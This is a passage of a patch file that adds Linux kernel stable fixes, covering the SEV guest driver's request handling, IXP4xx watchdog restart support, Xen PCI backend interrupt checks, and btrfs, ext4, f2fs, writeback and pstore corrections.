+@@ -445,12 +453,16 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 	memcpy(snp_dev->request, &snp_dev->secret_request,
+ 	       sizeof(snp_dev->secret_request));
+ 
+-	rc = __handle_guest_request(snp_dev, exit_code, fw_err);
++	rc = __handle_guest_request(snp_dev, exit_code, rio);
+ 	if (rc) {
+-		if (rc == -EIO && *fw_err == SNP_GUEST_REQ_INVALID_LEN)
++		if (rc == -EIO &&
++		    rio->exitinfo2 == SNP_GUEST_VMM_ERR(SNP_GUEST_VMM_ERR_INVALID_LEN))
+ 			return rc;
+ 
+-		dev_alert(snp_dev->dev, "Detected error from ASP request. rc: %d, fw_err: %llu\n", rc, *fw_err);
++		dev_alert(snp_dev->dev,
++			  "Detected error from ASP request. rc: %d, exitinfo2: 0x%llx\n",
++			  rc, rio->exitinfo2);
++
+ 		snp_disable_vmpck(snp_dev);
+ 		return rc;
+ 	}
+@@ -468,8 +480,8 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ static int get_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_ioctl *arg)
+ {
+ 	struct snp_guest_crypto *crypto = snp_dev->crypto;
++	struct snp_report_req *req = &snp_dev->req.report;
+ 	struct snp_report_resp *resp;
+-	struct snp_report_req req;
+ 	int rc, resp_len;
+ 
+ 	lockdep_assert_held(&snp_cmd_mutex);
+@@ -477,7 +489,7 @@ static int get_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_io
+ 	if (!arg->req_data || !arg->resp_data)
+ 		return -EINVAL;
+ 
+-	if (copy_from_user(&req, (void __user *)arg->req_data, sizeof(req)))
++	if (copy_from_user(req, (void __user *)arg->req_data, sizeof(*req)))
+ 		return -EFAULT;
+ 
+ 	/*
+@@ -490,9 +502,9 @@ static int get_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_io
+ 	if (!resp)
+ 		return -ENOMEM;
+ 
+-	rc = handle_guest_request(snp_dev, SVM_VMGEXIT_GUEST_REQUEST, arg->msg_version,
+-				  SNP_MSG_REPORT_REQ, &req, sizeof(req), resp->data,
+-				  resp_len, &arg->fw_err);
++	rc = handle_guest_request(snp_dev, SVM_VMGEXIT_GUEST_REQUEST, arg,
++				  SNP_MSG_REPORT_REQ, req, sizeof(*req), resp->data,
++				  resp_len);
+ 	if (rc)
+ 		goto e_free;
+ 
+@@ -506,9 +518,9 @@ e_free:
+ 
+ static int get_derived_key(struct snp_guest_dev *snp_dev, struct snp_guest_request_ioctl *arg)
+ {
++	struct snp_derived_key_req *req = &snp_dev->req.derived_key;
+ 	struct snp_guest_crypto *crypto = snp_dev->crypto;
+ 	struct snp_derived_key_resp resp = {0};
+-	struct snp_derived_key_req req;
+ 	int rc, resp_len;
+ 	/* Response data is 64 bytes and max authsize for GCM is 16 bytes. */
+ 	u8 buf[64 + 16];
+@@ -527,12 +539,11 @@ static int get_derived_key(struct snp_guest_dev *snp_dev, struct snp_guest_reque
+ 	if (sizeof(buf) < resp_len)
+ 		return -ENOMEM;
+ 
+-	if (copy_from_user(&req, (void __user *)arg->req_data, sizeof(req)))
++	if (copy_from_user(req, (void __user *)arg->req_data, sizeof(*req)))
+ 		return -EFAULT;
+ 
+-	rc = handle_guest_request(snp_dev, SVM_VMGEXIT_GUEST_REQUEST, arg->msg_version,
+-				  SNP_MSG_KEY_REQ, &req, sizeof(req), buf, resp_len,
+-				  &arg->fw_err);
++	rc = handle_guest_request(snp_dev, SVM_VMGEXIT_GUEST_REQUEST, arg,
++				  SNP_MSG_KEY_REQ, req, sizeof(*req), buf, resp_len);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -548,8 +559,8 @@ static int get_derived_key(struct snp_guest_dev *snp_dev, struct snp_guest_reque
+ 
+ static int get_ext_report(struct snp_guest_dev *snp_dev, struct snp_guest_request_ioctl *arg)
+ {
++	struct snp_ext_report_req *req = &snp_dev->req.ext_report;
+ 	struct snp_guest_crypto *crypto = snp_dev->crypto;
+-	struct snp_ext_report_req req;
+ 	struct snp_report_resp *resp;
+ 	int ret, npages = 0, resp_len;
+ 
+@@ -558,18 +569,18 @@ static int get_ext_report(struct snp_guest_dev *snp_dev, struct snp_guest_reques
+ 	if (!arg->req_data || !arg->resp_data)
+ 		return -EINVAL;
+ 
+-	if (copy_from_user(&req, (void __user *)arg->req_data, sizeof(req)))
++	if (copy_from_user(req, (void __user *)arg->req_data, sizeof(*req)))
+ 		return -EFAULT;
+ 
+ 	/* userspace does not want certificate data */
+-	if (!req.certs_len || !req.certs_address)
++	if (!req->certs_len || !req->certs_address)
+ 		goto cmd;
+ 
+-	if (req.certs_len > SEV_FW_BLOB_MAX_SIZE ||
+-	    !IS_ALIGNED(req.certs_len, PAGE_SIZE))
++	if (req->certs_len > SEV_FW_BLOB_MAX_SIZE ||
++	    !IS_ALIGNED(req->certs_len, PAGE_SIZE))
+ 		return -EINVAL;
+ 
+-	if (!access_ok((const void __user *)req.certs_address, req.certs_len))
++	if (!access_ok((const void __user *)req->certs_address, req->certs_len))
+ 		return -EFAULT;
+ 
+ 	/*
+@@ -578,8 +589,8 @@ static int get_ext_report(struct snp_guest_dev *snp_dev, struct snp_guest_reques
+ 	 * the host. If host does not supply any certs in it, then copy
+ 	 * zeros to indicate that certificate data was not provided.
+ 	 */
+-	memset(snp_dev->certs_data, 0, req.certs_len);
+-	npages = req.certs_len >> PAGE_SHIFT;
++	memset(snp_dev->certs_data, 0, req->certs_len);
++	npages = req->certs_len >> PAGE_SHIFT;
+ cmd:
+ 	/*
+ 	 * The intermediate response buffer is used while decrypting the
+@@ -592,15 +603,15 @@ cmd:
+ 		return -ENOMEM;
+ 
+ 	snp_dev->input.data_npages = npages;
+-	ret = handle_guest_request(snp_dev, SVM_VMGEXIT_EXT_GUEST_REQUEST, arg->msg_version,
+-				   SNP_MSG_REPORT_REQ, &req.data,
+-				   sizeof(req.data), resp->data, resp_len, &arg->fw_err);
++	ret = handle_guest_request(snp_dev, SVM_VMGEXIT_EXT_GUEST_REQUEST, arg,
++				   SNP_MSG_REPORT_REQ, &req->data,
++				   sizeof(req->data), resp->data, resp_len);
+ 
+ 	/* If certs length is invalid then copy the returned length */
+-	if (arg->fw_err == SNP_GUEST_REQ_INVALID_LEN) {
+-		req.certs_len = snp_dev->input.data_npages << PAGE_SHIFT;
++	if (arg->vmm_error == SNP_GUEST_VMM_ERR_INVALID_LEN) {
++		req->certs_len = snp_dev->input.data_npages << PAGE_SHIFT;
+ 
+-		if (copy_to_user((void __user *)arg->req_data, &req, sizeof(req)))
++		if (copy_to_user((void __user *)arg->req_data, req, sizeof(*req)))
+ 			ret = -EFAULT;
+ 	}
+ 
+@@ -608,8 +619,8 @@ cmd:
+ 		goto e_free;
+ 
+ 	if (npages &&
+-	    copy_to_user((void __user *)req.certs_address, snp_dev->certs_data,
+-			 req.certs_len)) {
++	    copy_to_user((void __user *)req->certs_address, snp_dev->certs_data,
++			 req->certs_len)) {
+ 		ret = -EFAULT;
+ 		goto e_free;
+ 	}
+@@ -632,7 +643,7 @@ static long snp_guest_ioctl(struct file *file, unsigned int ioctl, unsigned long
+ 	if (copy_from_user(&input, argp, sizeof(input)))
+ 		return -EFAULT;
+ 
+-	input.fw_err = 0xff;
++	input.exitinfo2 = 0xff;
+ 
+ 	/* Message version must be non-zero */
+ 	if (!input.msg_version)
+@@ -663,7 +674,7 @@ static long snp_guest_ioctl(struct file *file, unsigned int ioctl, unsigned long
+ 
+ 	mutex_unlock(&snp_cmd_mutex);
+ 
+-	if (input.fw_err && copy_to_user(argp, &input, sizeof(input)))
++	if (input.exitinfo2 && copy_to_user(argp, &input, sizeof(input)))
+ 		return -EFAULT;
+ 
+ 	return ret;
+diff --git a/drivers/watchdog/ixp4xx_wdt.c b/drivers/watchdog/ixp4xx_wdt.c
+index 281a48d9889fc..0fc91e9c4a773 100644
+--- a/drivers/watchdog/ixp4xx_wdt.c
++++ b/drivers/watchdog/ixp4xx_wdt.c
+@@ -105,6 +105,25 @@ static const struct watchdog_ops ixp4xx_wdt_ops = {
+ 	.owner = THIS_MODULE,
+ };
+ 
++/*
++ * The A0 version of the IXP422 had a bug in the watchdog making
++ * is useless, but we still need to use it to restart the system
++ * as it is the only way, so in this special case we register a
++ * "dummy" watchdog that doesn't really work, but will support
++ * the restart operation.
++ */
++static int ixp4xx_wdt_dummy(struct watchdog_device *wdd)
++{
++	return 0;
++}
++
++static const struct watchdog_ops ixp4xx_wdt_restart_only_ops = {
++	.start = ixp4xx_wdt_dummy,
++	.stop = ixp4xx_wdt_dummy,
++	.restart = ixp4xx_wdt_restart,
++	.owner = THIS_MODULE,
++};
++
+ static const struct watchdog_info ixp4xx_wdt_info = {
+ 	.options = WDIOF_KEEPALIVEPING
+ 		| WDIOF_MAGICCLOSE
+@@ -120,14 +139,17 @@ static void ixp4xx_clock_action(void *d)
+ 
+ static int ixp4xx_wdt_probe(struct platform_device *pdev)
+ {
++	static const struct watchdog_ops *iwdt_ops;
+ 	struct device *dev = &pdev->dev;
+ 	struct ixp4xx_wdt *iwdt;
+ 	struct clk *clk;
+ 	int ret;
+ 
+ 	if (!(read_cpuid_id() & 0xf) && !cpu_is_ixp46x()) {
+-		dev_err(dev, "Rev. A0 IXP42x CPU detected - watchdog disabled\n");
+-		return -ENODEV;
++		dev_info(dev, "Rev. A0 IXP42x CPU detected - only restart supported\n");
++		iwdt_ops = &ixp4xx_wdt_restart_only_ops;
++	} else {
++		iwdt_ops = &ixp4xx_wdt_ops;
+ 	}
+ 
+ 	iwdt = devm_kzalloc(dev, sizeof(*iwdt), GFP_KERNEL);
+@@ -153,7 +175,7 @@ static int ixp4xx_wdt_probe(struct platform_device *pdev)
+ 		iwdt->rate = IXP4XX_TIMER_FREQ;
+ 
+ 	iwdt->wdd.info = &ixp4xx_wdt_info;
+-	iwdt->wdd.ops = &ixp4xx_wdt_ops;
++	iwdt->wdd.ops = iwdt_ops;
+ 	iwdt->wdd.min_timeout = 1;
+ 	iwdt->wdd.max_timeout = U32_MAX / iwdt->rate;
+ 	iwdt->wdd.parent = dev;
+diff --git a/drivers/xen/xen-pciback/conf_space.c b/drivers/xen/xen-pciback/conf_space.c
+index 059de92aea7d0..d47eee6c51435 100644
+--- a/drivers/xen/xen-pciback/conf_space.c
++++ b/drivers/xen/xen-pciback/conf_space.c
+@@ -288,12 +288,6 @@ int xen_pcibk_get_interrupt_type(struct pci_dev *dev)
+ 	u16 val;
+ 	int ret = 0;
+ 
+-	err = pci_read_config_word(dev, PCI_COMMAND, &val);
+-	if (err)
+-		return err;
+-	if (!(val & PCI_COMMAND_INTX_DISABLE))
+-		ret |= INTERRUPT_TYPE_INTX;
+-
+ 	/*
+ 	 * Do not trust dev->msi(x)_enabled here, as enabling could be done
+ 	 * bypassing the pci_*msi* functions, by the qemu.
+@@ -316,6 +310,19 @@ int xen_pcibk_get_interrupt_type(struct pci_dev *dev)
+ 		if (val & PCI_MSIX_FLAGS_ENABLE)
+ 			ret |= INTERRUPT_TYPE_MSIX;
+ 	}
++
++	/*
++	 * PCIe spec says device cannot use INTx if MSI/MSI-X is enabled,
++	 * so check for INTx only when both are disabled.
++	 */
++	if (!ret) {
++		err = pci_read_config_word(dev, PCI_COMMAND, &val);
++		if (err)
++			return err;
++		if (!(val & PCI_COMMAND_INTX_DISABLE))
++			ret |= INTERRUPT_TYPE_INTX;
++	}
++
+ 	return ret ?: INTERRUPT_TYPE_NONE;
+ }
+ 
+diff --git a/drivers/xen/xen-pciback/conf_space_capability.c b/drivers/xen/xen-pciback/conf_space_capability.c
+index 097316a741268..1948a9700c8fa 100644
+--- a/drivers/xen/xen-pciback/conf_space_capability.c
++++ b/drivers/xen/xen-pciback/conf_space_capability.c
+@@ -236,10 +236,16 @@ static int msi_msix_flags_write(struct pci_dev *dev, int offset, u16 new_value,
+ 		return PCIBIOS_SET_FAILED;
+ 
+ 	if (new_value & field_config->enable_bit) {
+-		/* don't allow enabling together with other interrupt types */
++		/*
++		 * Don't allow enabling together with other interrupt type, but do
++		 * allow enabling MSI(-X) while INTx is still active to please Linuxes
++		 * MSI(-X) startup sequence. It is safe to do, as according to PCI
++		 * spec, device with enabled MSI(-X) shouldn't use INTx.
++		 */
+ 		int int_type = xen_pcibk_get_interrupt_type(dev);
+ 
+ 		if (int_type == INTERRUPT_TYPE_NONE ||
++		    int_type == INTERRUPT_TYPE_INTX ||
+ 		    int_type == field_config->int_type)
+ 			goto write;
+ 		return PCIBIOS_SET_FAILED;
+diff --git a/drivers/xen/xen-pciback/conf_space_header.c b/drivers/xen/xen-pciback/conf_space_header.c
+index 981435103af1a..fc03326459664 100644
+--- a/drivers/xen/xen-pciback/conf_space_header.c
++++ b/drivers/xen/xen-pciback/conf_space_header.c
+@@ -104,24 +104,9 @@ static int command_write(struct pci_dev *dev, int offset, u16 value, void *data)
+ 		pci_clear_mwi(dev);
+ 	}
+ 
+-	if (dev_data && dev_data->allow_interrupt_control) {
+-		if ((cmd->val ^ value) & PCI_COMMAND_INTX_DISABLE) {
+-			if (value & PCI_COMMAND_INTX_DISABLE) {
+-				pci_intx(dev, 0);
+-			} else {
+-				/* Do not allow enabling INTx together with MSI or MSI-X. */
+-				switch (xen_pcibk_get_interrupt_type(dev)) {
+-				case INTERRUPT_TYPE_NONE:
+-					pci_intx(dev, 1);
+-					break;
+-				case INTERRUPT_TYPE_INTX:
+-					break;
+-				default:
+-					return PCIBIOS_SET_FAILED;
+-				}
+-			}
+-		}
+-	}
++	if (dev_data && dev_data->allow_interrupt_control &&
++	    ((cmd->val ^ value) & PCI_COMMAND_INTX_DISABLE))
++		pci_intx(dev, !(value & PCI_COMMAND_INTX_DISABLE));
+ 
+ 	cmd->val = value;
+ 
+diff --git a/drivers/xen/xenbus/xenbus_probe.c b/drivers/xen/xenbus/xenbus_probe.c
+index 639bf628389ba..3205e5d724c8c 100644
+--- a/drivers/xen/xenbus/xenbus_probe.c
++++ b/drivers/xen/xenbus/xenbus_probe.c
+@@ -1025,7 +1025,7 @@ static int __init xenbus_init(void)
+ 			if (err < 0) {
+ 				pr_err("xenstore_late_init couldn't bind irq err=%d\n",
+ 				       err);
+-				return err;
++				goto out_error;
+ 			}
+ 
+ 			xs_init_irq = err;
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 9474265ee7ea3..e015e1e025b6e 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -2420,7 +2420,7 @@ static noinline int key_in_sk(struct btrfs_key *key,
+ static noinline int copy_to_sk(struct btrfs_path *path,
+ 			       struct btrfs_key *key,
+ 			       struct btrfs_ioctl_search_key *sk,
+-			       size_t *buf_size,
++			       u64 *buf_size,
+ 			       char __user *ubuf,
+ 			       unsigned long *sk_offset,
+ 			       int *num_found)
+@@ -2552,7 +2552,7 @@ out:
+ 
+ static noinline int search_ioctl(struct inode *inode,
+ 				 struct btrfs_ioctl_search_key *sk,
+-				 size_t *buf_size,
++				 u64 *buf_size,
+ 				 char __user *ubuf)
+ {
+ 	struct btrfs_fs_info *info = btrfs_sb(inode->i_sb);
+@@ -2625,7 +2625,7 @@ static noinline int btrfs_ioctl_tree_search(struct inode *inode,
+ 	struct btrfs_ioctl_search_args __user *uargs = argp;
+ 	struct btrfs_ioctl_search_key sk;
+ 	int ret;
+-	size_t buf_size;
++	u64 buf_size;
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+@@ -2655,8 +2655,8 @@ static noinline int btrfs_ioctl_tree_search_v2(struct inode *inode,
+ 	struct btrfs_ioctl_search_args_v2 __user *uarg = argp;
+ 	struct btrfs_ioctl_search_args_v2 args;
+ 	int ret;
+-	size_t buf_size;
+-	const size_t buf_limit = SZ_16M;
++	u64 buf_size;
++	const u64 buf_limit = SZ_16M;
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 1bb55a6d79c23..aa5aadd70bbc2 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -1010,6 +1010,11 @@ static int ext4_ext_insert_index(handle_t *handle, struct inode *inode,
+ 		ix = curp->p_idx;
+ 	}
+ 
++	if (unlikely(ix > EXT_MAX_INDEX(curp->p_hdr))) {
++		EXT4_ERROR_INODE(inode, "ix > EXT_MAX_INDEX!");
++		return -EFSCORRUPTED;
++	}
++
+ 	len = EXT_LAST_INDEX(curp->p_hdr) - ix + 1;
+ 	BUG_ON(len < 0);
+ 	if (len > 0) {
+@@ -1019,11 +1024,6 @@ static int ext4_ext_insert_index(handle_t *handle, struct inode *inode,
+ 		memmove(ix + 1, ix, len * sizeof(struct ext4_extent_idx));
+ 	}
+ 
+-	if (unlikely(ix > EXT_MAX_INDEX(curp->p_hdr))) {
+-		EXT4_ERROR_INODE(inode, "ix > EXT_MAX_INDEX!");
+-		return -EFSCORRUPTED;
+-	}
+-
+ 	ix->ei_block = cpu_to_le32(logical);
+ 	ext4_idx_store_pblock(ix, ptr);
+ 	le16_add_cpu(&curp->p_hdr->eh_entries, 1);
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index a982f91b71eb2..ea05710ca9bdf 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2263,8 +2263,10 @@ skip_reading_dnode:
+ 		f2fs_wait_on_block_writeback(inode, blkaddr);
+ 
+ 		if (f2fs_load_compressed_page(sbi, page, blkaddr)) {
+-			if (atomic_dec_and_test(&dic->remaining_pages))
++			if (atomic_dec_and_test(&dic->remaining_pages)) {
+ 				f2fs_decompress_cluster(dic, true);
++				break;
++			}
+ 			continue;
+ 		}
+ 
+@@ -2950,7 +2952,9 @@ static int f2fs_write_cache_pages(struct address_space *mapping,
+ {
+ 	int ret = 0;
+ 	int done = 0, retry = 0;
+-	struct page *pages[F2FS_ONSTACK_PAGES];
++	struct page *pages_local[F2FS_ONSTACK_PAGES];
++	struct page **pages = pages_local;
++	struct folio_batch fbatch;
+ 	struct f2fs_sb_info *sbi = F2FS_M_SB(mapping);
+ 	struct bio *bio = NULL;
+ 	sector_t last_block;
+@@ -2971,7 +2975,9 @@ static int f2fs_write_cache_pages(struct address_space *mapping,
+ 		.private = NULL,
+ 	};
+ #endif
++	int nr_folios, p, idx;
+ 	int nr_pages;
++	unsigned int max_pages = F2FS_ONSTACK_PAGES;
+ 	pgoff_t index;
+ 	pgoff_t end;		/* Inclusive */
+ 	pgoff_t done_index;
+@@ -2981,6 +2987,17 @@ static int f2fs_write_cache_pages(struct address_space *mapping,
+ 	int submitted = 0;
+ 	int i;
+ 
++#ifdef CONFIG_F2FS_FS_COMPRESSION
++	if (f2fs_compressed_file(inode) &&
++		1 << cc.log_cluster_size > F2FS_ONSTACK_PAGES) {
++		pages = f2fs_kzalloc(sbi, sizeof(struct page *) <<
++				cc.log_cluster_size, GFP_NOFS | __GFP_NOFAIL);
++		max_pages = 1 << cc.log_cluster_size;
++	}
++#endif
++
++	folio_batch_init(&fbatch);
++
+ 	if (get_dirty_pages(mapping->host) <=
+ 				SM_I(F2FS_M_SB(mapping))->min_hot_blocks)
+ 		set_inode_flag(mapping->host, FI_HOT_DATA);
+@@ -3006,13 +3023,38 @@ retry:
+ 		tag_pages_for_writeback(mapping, index, end);
+ 	done_index = index;
+ 	while (!done && !retry && (index <= end)) {
+-		nr_pages = find_get_pages_range_tag(mapping, &index, end,
+-				tag, F2FS_ONSTACK_PAGES, pages);
+-		if (nr_pages == 0)
++		nr_pages = 0;
++again:
++		nr_folios = filemap_get_folios_tag(mapping, &index, end,
++				tag, &fbatch);
++		if (nr_folios == 0) {
++			if (nr_pages)
++				goto write;
+ 			break;
++		}
+ 
++		for (i = 0; i < nr_folios; i++) {
++			struct folio *folio = fbatch.folios[i];
++
++			idx = 0;
++			p = folio_nr_pages(folio);
++add_more:
++			pages[nr_pages] = folio_page(folio, idx);
++			folio_get(folio);
++			if (++nr_pages == max_pages) {
++				index = folio->index + idx + 1;
++				folio_batch_release(&fbatch);
++				goto write;
++			}
++			if (++idx < p)
++				goto add_more;
++		}
++		folio_batch_release(&fbatch);
++		goto again;
++write:
+ 		for (i = 0; i < nr_pages; i++) {
+ 			struct page *page = pages[i];
++			struct folio *folio = page_folio(page);
+ 			bool need_readd;
+ readd:
+ 			need_readd = false;
+@@ -3029,7 +3071,7 @@ readd:
+ 				}
+ 
+ 				if (!f2fs_cluster_can_merge_page(&cc,
+-								page->index)) {
++								folio->index)) {
+ 					ret = f2fs_write_multi_pages(&cc,
+ 						&submitted, wbc, io_type);
+ 					if (!ret)
+@@ -3038,27 +3080,28 @@ readd:
+ 				}
+ 
+ 				if (unlikely(f2fs_cp_error(sbi)))
+-					goto lock_page;
++					goto lock_folio;
+ 
+ 				if (!f2fs_cluster_is_empty(&cc))
+-					goto lock_page;
++					goto lock_folio;
+ 
+ 				if (f2fs_all_cluster_page_ready(&cc,
+ 					pages, i, nr_pages, true))
+-					goto lock_page;
++					goto lock_folio;
+ 
+ 				ret2 = f2fs_prepare_compress_overwrite(
+ 							inode, &pagep,
+-							page->index, &fsdata);
++							folio->index, &fsdata);
+ 				if (ret2 < 0) {
+ 					ret = ret2;
+ 					done = 1;
+ 					break;
+ 				} else if (ret2 &&
+ 					(!f2fs_compress_write_end(inode,
+-						fsdata, page->index, 1) ||
++						fsdata, folio->index, 1) ||
+ 					 !f2fs_all_cluster_page_ready(&cc,
+-						pages, i, nr_pages, false))) {
++						pages, i, nr_pages,
++						false))) {
+ 					retry = 1;
+ 					break;
+ 				}
+@@ -3071,46 +3114,47 @@ readd:
+ 				break;
+ 			}
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+-lock_page:
++lock_folio:
+ #endif
+-			done_index = page->index;
++			done_index = folio->index;
+ retry_write:
+-			lock_page(page);
++			folio_lock(folio);
+ 
+-			if (unlikely(page->mapping != mapping)) {
++			if (unlikely(folio->mapping != mapping)) {
+ continue_unlock:
+-				unlock_page(page);
++				folio_unlock(folio);
+ 				continue;
+ 			}
+ 
+-			if (!PageDirty(page)) {
++			if (!folio_test_dirty(folio)) {
+ 				/* someone wrote it for us */
+ 				goto continue_unlock;
+ 			}
+ 
+-			if (PageWriteback(page)) {
++			if (folio_test_writeback(folio)) {
+ 				if (wbc->sync_mode != WB_SYNC_NONE)
+-					f2fs_wait_on_page_writeback(page,
++					f2fs_wait_on_page_writeback(
++							&folio->page,
+ 							DATA, true, true);
+ 				else
+ 					goto continue_unlock;
+ 			}
+ 
+-			if (!clear_page_dirty_for_io(page))
++			if (!folio_clear_dirty_for_io(folio))
+ 				goto continue_unlock;
+ 
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+ 			if (f2fs_compressed_file(inode)) {
+-				get_page(page);
+-				f2fs_compress_ctx_add_page(&cc, page);
++				folio_get(folio);
++				f2fs_compress_ctx_add_page(&cc, &folio->page);
+ 				continue;
+ 			}
+ #endif
+-			ret = f2fs_write_single_data_page(page, &submitted,
+-					&bio, &last_block, wbc, io_type,
+-					0, true);
++			ret = f2fs_write_single_data_page(&folio->page,
++					&submitted, &bio, &last_block,
++					wbc, io_type, 0, true);
+ 			if (ret == AOP_WRITEPAGE_ACTIVATE)
+-				unlock_page(page);
++				folio_unlock(folio);
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+ result:
+ #endif
+@@ -3134,7 +3178,8 @@ result:
+ 					}
+ 					goto next;
+ 				}
+-				done_index = page->index + 1;
++				done_index = folio->index +
++					folio_nr_pages(folio);
+ 				done = 1;
+ 				break;
+ 			}
+@@ -3182,6 +3227,11 @@ next:
+ 	if (bio)
+ 		f2fs_submit_merged_ipu_write(sbi, &bio, NULL);
+ 
++#ifdef CONFIG_F2FS_FS_COMPRESSION
++	if (pages != pages_local)
++		kfree(pages);
++#endif
++
+ 	return ret;
+ }
+ 
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 746c71716bead..d0c17366ebf48 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -3249,6 +3249,7 @@ int f2fs_precache_extents(struct inode *inode)
+ 		return -EOPNOTSUPP;
+ 
+ 	map.m_lblk = 0;
++	map.m_pblk = 0;
+ 	map.m_next_pgofs = NULL;
+ 	map.m_next_extent = &m_next_extent;
+ 	map.m_seg_type = NO_CHECK_TYPE;
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 2046f633fe57a..1ba85ef97cbd3 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -548,6 +548,29 @@ static int f2fs_set_test_dummy_encryption(struct super_block *sb,
+ }
+ 
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
++static bool is_compress_extension_exist(struct f2fs_sb_info *sbi,
++					const char *new_ext, bool is_ext)
++{
++	unsigned char (*ext)[F2FS_EXTENSION_LEN];
++	int ext_cnt;
++	int i;
++
++	if (is_ext) {
++		ext = F2FS_OPTION(sbi).extensions;
++		ext_cnt = F2FS_OPTION(sbi).compress_ext_cnt;
++	} else {
++		ext = F2FS_OPTION(sbi).noextensions;
++		ext_cnt = F2FS_OPTION(sbi).nocompress_ext_cnt;
++	}
++
++	for (i = 0; i < ext_cnt; i++) {
++		if (!strcasecmp(new_ext, ext[i]))
++			return true;
++	}
++
++	return false;
++}
++
+ /*
+  * 1. The same extension name cannot not appear in both compress and non-compress extension
+  * at the same time.
+@@ -1145,6 +1168,11 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 				return -EINVAL;
+ 			}
+ 
++			if (is_compress_extension_exist(sbi, name, true)) {
++				kfree(name);
++				break;
++			}
++
+ 			strcpy(ext[ext_cnt], name);
+ 			F2FS_OPTION(sbi).compress_ext_cnt++;
+ 			kfree(name);
+@@ -1169,6 +1197,11 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 				return -EINVAL;
+ 			}
+ 
++			if (is_compress_extension_exist(sbi, name, false)) {
++				kfree(name);
++				break;
++			}
++
+ 			strcpy(noext[noext_cnt], name);
+ 			F2FS_OPTION(sbi).nocompress_ext_cnt++;
+ 			kfree(name);
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index a5c31a479aacc..be2d329843d44 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -611,6 +611,24 @@ out_free:
+ 	kfree(isw);
+ }
+ 
++static bool isw_prepare_wbs_switch(struct inode_switch_wbs_context *isw,
++				   struct list_head *list, int *nr)
++{
++	struct inode *inode;
++
++	list_for_each_entry(inode, list, i_io_list) {
++		if (!inode_prepare_wbs_switch(inode, isw->new_wb))
++			continue;
++
++		isw->inodes[*nr] = inode;
++		(*nr)++;
++
++		if (*nr >= WB_MAX_INODES_PER_ISW - 1)
++			return true;
++	}
++	return false;
++}
++
+ /**
+  * cleanup_offline_cgwb - detach associated inodes
+  * @wb: target wb
+@@ -623,7 +641,6 @@ bool cleanup_offline_cgwb(struct bdi_writeback *wb)
+ {
+ 	struct cgroup_subsys_state *memcg_css;
+ 	struct inode_switch_wbs_context *isw;
+-	struct inode *inode;
+ 	int nr;
+ 	bool restart = false;
+ 
+@@ -645,17 +662,17 @@ bool cleanup_offline_cgwb(struct bdi_writeback *wb)
+ 
+ 	nr = 0;
+ 	spin_lock(&wb->list_lock);
+-	list_for_each_entry(inode, &wb->b_attached, i_io_list) {
+-		if (!inode_prepare_wbs_switch(inode, isw->new_wb))
+-			continue;
+-
+-		isw->inodes[nr++] = inode;
+-
+-		if (nr >= WB_MAX_INODES_PER_ISW - 1) {
+-			restart = true;
+-			break;
+-		}
+-	}
++	/*
++	 * In addition to the inodes that have completed writeback, also switch
++	 * cgwbs for those inodes only with dirty timestamps. Otherwise, those
++	 * inodes won't be written back for a long time when lazytime is
++	 * enabled, and thus pinning the dying cgwbs. It won't break the
++	 * bandwidth restrictions, as writeback of inode metadata is not
++	 * accounted for.
++	 */
++	restart = isw_prepare_wbs_switch(isw, &wb->b_attached, &nr);
++	if (!restart)
++		restart = isw_prepare_wbs_switch(isw, &wb->b_dirty_time, &nr);
+ 	spin_unlock(&wb->list_lock);
+ 
+ 	/* no attached inodes? bail out */
+diff --git a/fs/pstore/platform.c b/fs/pstore/platform.c
+index 0c034ea399547..7787fb544621c 100644
+--- a/fs/pstore/platform.c
++++ b/fs/pstore/platform.c
+@@ -561,6 +561,8 @@ out:
+  */
+ int pstore_register(struct pstore_info *psi)
+ {
++	char *new_backend;
++
+ 	if (backend && strcmp(backend, psi->name)) {
+ 		pr_warn("ignoring unexpected backend '%s'\n", psi->name);
+ 		return -EPERM;
+@@ -580,11 +582,16 @@ int pstore_register(struct pstore_info *psi)
+ 		return -EINVAL;
+ 	}
+ 
++	new_backend = kstrdup(psi->name, GFP_KERNEL);
++	if (!new_backend)
++		return -ENOMEM;
++
+ 	mutex_lock(&psinfo_lock);
+ 	if (psinfo) {
+ 		pr_warn("backend '%s' already loaded: ignoring '%s'\n",
+ 			psinfo->name, psi->name);
+ 		mutex_unlock(&psinfo_lock);
++		kfree(new_backend);
+ 		return -EBUSY;
+ 	}
+ 
+@@ -617,7 +624,7 @@ int pstore_register(struct pstore_info *psi)
+ 	 * Update the module parameter backend, so it is visible
+ 	 * through /sys/module/pstore/parameters/backend
+ 	 */
+-	backend = kstrdup(psi->name, GFP_KERNEL);
++	backend = new_backend;
+ 
+ 	pr_info("Registered %s as persistent store backend\n", psi->name);
+ 
+diff --git a/include/kunit/visibility.h b/include/kunit/visibility.h
+new file mode 100644
+index 0000000000000..0dfe35feeec60
+--- /dev/null
++++ b/include/kunit/visibility.h
+@@ -0,0 +1,33 @@
